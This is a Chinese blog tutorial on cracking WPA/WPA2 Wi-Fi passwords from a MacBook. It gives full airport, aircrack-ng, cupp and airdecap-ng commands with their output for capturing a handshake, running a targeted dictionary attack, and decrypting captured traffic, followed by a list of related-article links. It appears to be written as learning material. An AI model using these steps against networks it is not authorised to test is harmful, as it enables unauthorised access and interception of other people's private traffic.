2020年的寒假过得属实弟弟
我在家里默默地刷安全牛的教程,最新刷到了“无线攻击”这一章,虽然在学校的机器上安装了Kali虚机,但是没有Usb无线网卡。于是用MacBook尝试了一下。
PS: 本文参考了网络上众多的文章,但是有我自己发挥的部分。由于现在绝大部分无线网络的加密方法都是WPA、WPA2,弱点比较大的WEP我现在还没碰到过,已经很少使用,而WPA、WPA2几乎没有弱点,想要破解只能暴力穷举,理论上只要你的密码设置的足够复杂,就是不可破解的(但谁会把Wifi密码设置的这么复杂)

如何发现附近的网络

这里的发现网络,不是单指如何获得附近有哪些WiFi,而是附近有哪些WiFi,他们分别用的什么加密密钥。在Kali上实现这一点,我们需要使用airmon-ng来发现附近的WiFi,而MacBook自带了强大的airport工具。

使用airport

为了方便我们使用airport,先在命令行中执行以下命令:

sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport

上述命令让我们可以在命令行直接输入airport来使用它。

发现附近网络

在命令行输入:

airport -s

得到如下结果:

Princeling-Mac at /opt ❯ airport -sSSID BSSID             RSSI CHANNEL HT CC SECURITY (auth/unicast/group)FAST_236864 cc:34:29:23:68:64 -81  6,-1    Y  -- WPA(PSK/AES/AES) WPA2(PSK/AES/AES)FAST_20C20A 78:eb:14:20:c2:0a -77  12      Y  -- WPA(PSK/TKIP,AES/TKIP) WPA2(PSK/TKIP,AES/TKIP)FAST_11D9DC c0:61:18:11:d9:dc -59  7       Y  -- WPA(PSK/TKIP,AES/TKIP) WPA2(PSK/TKIP,AES/TKIP)iTV-KtYh 46:7b:bb:b9:c5:d0 -59  9       Y  US WPA(PSK/TKIP,AES/TKIP)ChinaNet-KtYh 44:7b:bb:a9:c5:d0 -59  9       Y  US WPA(PSK/TKIP,AES/TKIP)

等待握手信号

事实上,我们的暴力穷举不可能是不停的给路由器发送请求,这种做法吃力又不讨好。网络上有很多描述WPA破解原理的文章,可以去阅读。简单地说,我们需要侦听到一个用户的正确登录,然后获取登录过程中的两组密钥,之后就可以离线破解了。

侦听数据

airport en0 sniff 7

en0 是你的无线网卡,这个信息可以通过输入

ifconfig

得到。

如果有很多网卡,选择你用来连接Wifi的那个。

7 是上文中,发现附近网络的CHANNEL列,需要和你想要破解的目标网络一致。

运行该命令的时候,wifi的图标会发生改变。

这个时候你的网络连接也会断开,按下ctrl+c结束侦听。

分析数据

不可避免的,还是要安装airmon-ng

brew install airmon-ng

安装完成后:

aircrack-ng /tmp/airportSniffLbhZSp.cap
Princeling-Mac at /opt ❯ aircrack-ng /tmp/airportSniffLbhZSp.cap
Opening /tmp/airportSniffLbhZSp.cap
Read 8351 packets.#  BSSID              ESSID                     Encryption1  C0:61:18:11:D9:DC  FAST_11D9DC               WPA (1 handshake)2  CC:34:29:23:68:64  FAST_236864               No data - WEP or WPAIndex number of target network ?

在抓包过程中,我用手机登录了一下无线网FAST_11D9DC。可以看到airport已经抓到了一组握手数据。

在“Index number of target network ?”这里输入想要破解的wifi,由于2没有握手数据,所以我们输入1。

aircrack破解

aircrack-ng -w dict.txt -b c0:61:18:11:d9:dc /tmp/airportSniffLbhZSp.cap

dict.txt 是字典文件,c0:61:18:11:d9:dc 是发现附近网络中的BSSID,/tmp/airportSniffLbhZSp.cap是数据包。

字典文件在哪儿?

1. 互联网下载

在网络上有很多人搜集到的wifi字典,如果是公共场合,这些字典的命中率还是很高的。但是字典很庞大,暴力穷举需要消耗很长时间。

2. 自己制作

如果是在家庭、私人场合的WiFi,字典的质量就显得很重要。这里推荐一个社工字典制作程序。可以去github搜索cupp下载。或者点击直达

简单演示一下cupp的使用。

python3 cupp.py -I
Princeling-Mac at ~/Documents/GitHub/cupp ❯ python3 cupp.py -I___________cupp.py!                 # Common\                     # User\   ,__,             # Passwords\  (oo)____         # Profiler(__)    )\||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ][ Mebus | https://github.com/Mebus/][+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)> First Name: wanglei
> Surname:
> Nickname: princeling
> Birthdate (DDMMYYYY):> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):> Pet's name:
> Company name:> Do you want to add some key words about the victim? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to wanglei.txt, counting 68 words.
[+] Now load your pistolero with wanglei.txt and shoot! Good luck!

不知道就一路回车下去,填写一些相关信息,就可以生成字典了。

然后用这个字典破解wifi内容。

如果你的字典中包含密码,则会出现如下界面:

                          Aircrack-ng 1.5.2[00:00:00] 8/1 keys tested (88.65 k/s)Time left: 0 seconds                                     800.00%KEY FOUND! [ 88888888 ]Master Key     : 26 FB 23 5F FE 0B 39 0A C1 12 F3 30 55 FF EE 02CB 7E EA 13 B0 CE D6 7E BB 7E AA 52 1B EA 2E 02Transient Key  : 8D E6 57 44 42 BE 95 C2 EC 75 60 FA CA 1A 1A C1C8 31 46 C4 4D DB 98 4D 34 D7 5A D0 15 9F BD 426C 9C 96 5C FC AE 24 39 83 1D A8 89 C7 71 F9 4A64 D5 DA FB 24 7E 91 47 E6 35 DD 9A 87 A6 A2 5BEAPOL HMAC     : 8D 62 A3 8A 42 D1 68 EA 4B 89 FC FC B6 BC C9 AA

说明破解成功。

airdecap分析包

现在我们拿到了密码。但是如果折腾了这么半天,目的就是为了蹭WiFi,感觉有点呆呆的。

有了WiFi的密码,实际上我们可以对WiFi的数据包进行解包,工具就是airdecap。

这个时候再拿出刚刚抓取的数据包,用wireshark打开。

可以看到全都是802.11的协议,并且数据帧全都是加密的数据。

在命令行输入:

airdecap-ng -e FAST_11D9DC -b c0:61:18:11:d9:dc -p 88888888 ./Downloads/11d9dc.cap

e是essid,b是bssid,p是破解出来的WiFi密码。

运行成功后,会在目标目录生成对应的dec文件。


再用WireShark打开,就能看到解密后的包内容了。

MacOS破解WiFi(WPA、WPA2)相关推荐

  1. WIFI WPA/WPA2加密方式

    文章目录 1.1 准备无线网卡 1.2 无线网卡接入虚拟机 1.3 查看无线网卡信息 1.4 开启无线网卡监听模式 1.5 监听周围无线网络信息 1.6 如果不能监听,需要设置Monitor模式 1. ...

  2. Aircrack之破解WPA/WPA2类型的wifi密码

    信息安全之破解WPA/WPA2类型的wifi密码 Aircrack是破解WEP/WPA/WPA2加密的主流工具之一,排名靠前,操作简单,对刚玩安全的人也非常友好. Aircrack-ng套件包含的工具 ...

  3. 新方法破解Wi-Fi WPA2加密平均只需10分钟

    原文地址:https://www.mozhe.cn/news/detail/461 随着Wi-Fi劫持等各类事件的频发,人们不难意识到传统的Wi-Fi变得不再安全.近日Hashcat的首席开发人员Je ...

  4. wifi认证过程wpa/wpa2

    今天总结一下前段看协议,关于PSK(pre-shared key)方式下wpa/wpa2的认证过程. 1.RSNE 首先,在beacon或probe response帧中,带有RSNE字段,内容如下: ...

  5. Aicrack-ng破解WPA/WPA2

    简介 这篇文章介绍一下如何使用aircrack-ng破解采用预共享密钥(PSK)认证的WPA/WPA2网络.推荐读者先阅读一些关于WPA/WPA2的背景知识.可参见这里.或者这篇文章.点击此处可下载p ...

  6. kali破解WiFi时wlan0没有变wlan0mon_黑客入门干货:黑客使用 Aircrack-ng 破解 Wi-Fi 密码

    1.首先请不要使用此方法去搞破坏,去蹭Wi-Fi,我认为技术本身的价值很大,尤其是在学习这个技术的过程中解决遇到的问题,当经过重重困难最后终于成功之后的喜悦又怎么能拿去蹭网呢.我在此过程中都是用自己路 ...

  7. 史上最详细的Kali Linux破解Wifi无线网络教程

    有人说,我会用WiFi万能钥匙就是懂破解了?这想法的确是有点天真,如果说出去可能会被人取笑.首先今天给大家讲解下Wifi破解的原理. 1.Wifi万能钥匙的工作原理是共享收集 比如A装了万能钥匙,然后 ...

  8. Wifi密码破解1:通过字典(暴力)破解WIFI密码

    简单破解WEP/WPA/WPA2加密的WIFI密码,平台kali-linux 工具:Aircrack-ng 过程很简单:先抓含有正确密码的握手包(客户端连接wifi的时候会互相交换报文),然后从这个抓 ...

  9. 【2】Kali破解家用WI-FI密码 - WPA/WPA2加密

    [学习记录] 本人小白一枚,文章用来记录自己目前的学习进度,希望能够用最通俗易懂的语言和命令来为大家讲清楚我的实验过程和经验,同时期待我的学习经验也可以帮助到大家.还望各位大佬能不吝朱玉,指出我的错误 ...

  10. 使用AirCrack破解wifi密码(wpa/wpa2)

    本文使用的是Kali Linux,该系统主要以渗透测试及'破解wifi密码'闻名. 如果你使用Macbook,看这里:使用macbook破解WPA/WPA2 wifi密码 要求: 安装有Kali Li ...

最新文章

  1. nginx进阶-动静分离,负载均衡
  2. linux线程调度函数,Linux调度策略及线程优先级设置
  3. java单例模式几种实现方式
  4. 常用的MySQL图形化管理软件
  5. python中列表,元组,字符串如何互相转换
  6. Page.ClientScript.RegisterArrayDeclaration
  7. 因财务造假,贾跃亭被罚 2.41 亿元;华为徐直军重申不造成:但将推子品牌汽车;Gradle 7.0 发布|极客头条...
  8. 性能测试很难吗?一文带你学会性能测试核心流程和概念
  9. oracle sql 导入mysql数据库备份_使用PL/SQL连接oracle数据库,并将数据进行导出备份和导入恢复...
  10. mysql数据库复习
  11. arm的bin二进制代码分析
  12. java桥梁模式_java设计模式之桥梁模式(Bridge)
  13. python with as 用法_你在 Python 中常常写的 with..as.. 到底是个啥?
  14. ai人工智能_毕竟人工智能可能不适合您
  15. 数据库设计原则、表字段命名规则、索引调优建立规则
  16. 165个站长在线工具箱网站源码/野兔在线工具系统V2.2.7中文版
  17. perl:DNA序列翻译成氨基酸序列的若干方法,直接法,简并法,哈希法,以及perl中的uc和lc函数(上)
  18. linux安装docker容器(copy就完了)
  19. meta-inf java_jar包中的META-INF 文件夹是干嘛的?
  20. Oracle存储过程打印输出错误信息、行号,快速排查

热门文章

  1. 有关南怀瑾、朱熹周易断卦法的个人观点
  2. Git取消add 、 commit、push的命令
  3. iOS开发UI篇—iPad和iPhone开发的比较
  4. 网络层 --- 路由器工作原理
  5. python扇贝每日一句api_【扇贝批量添加单词到词库】利用python调用扇贝API (oauth2)...
  6. 大话西游服务器维护多长时间,《大话西游3》2010-9-21服务器停机维护公告(二)...
  7. 桌面智能分析产品+“智同211”计划,永洪科技打造数据价值生态圈!
  8. plt.text函数用法
  9. python3获取天气预报
  10. Softmax回归求导公式推导